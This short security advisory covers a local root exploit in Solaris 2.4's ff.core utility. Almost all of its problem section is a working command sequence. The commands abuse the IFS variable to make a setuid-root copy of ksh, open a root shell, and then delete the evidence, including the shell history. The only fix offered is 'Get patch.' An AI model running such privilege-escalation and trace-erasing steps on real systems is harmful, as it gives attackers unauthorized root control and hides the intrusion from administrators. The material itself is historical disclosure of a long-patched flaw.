COMMAND
/usr/openwin/bin/ff.core
SYSTEMS AFFECTED
Solaris 2.4
PROBLEM
% ksh
% cd /tmp
% cp /bin/ksh .
% echo "chown root ksh; chmod u+s ksh" > usr
% chmod +x usr
% export IFS=/
% ff.core 0 1 /dev/fd0 /
% ./ksh
# rm usr
# rm -f ksh
# rm -f .sh_history
NOTE: Original exploit was different, this one is by Security
Bugware.
SOLUTION
Get patch.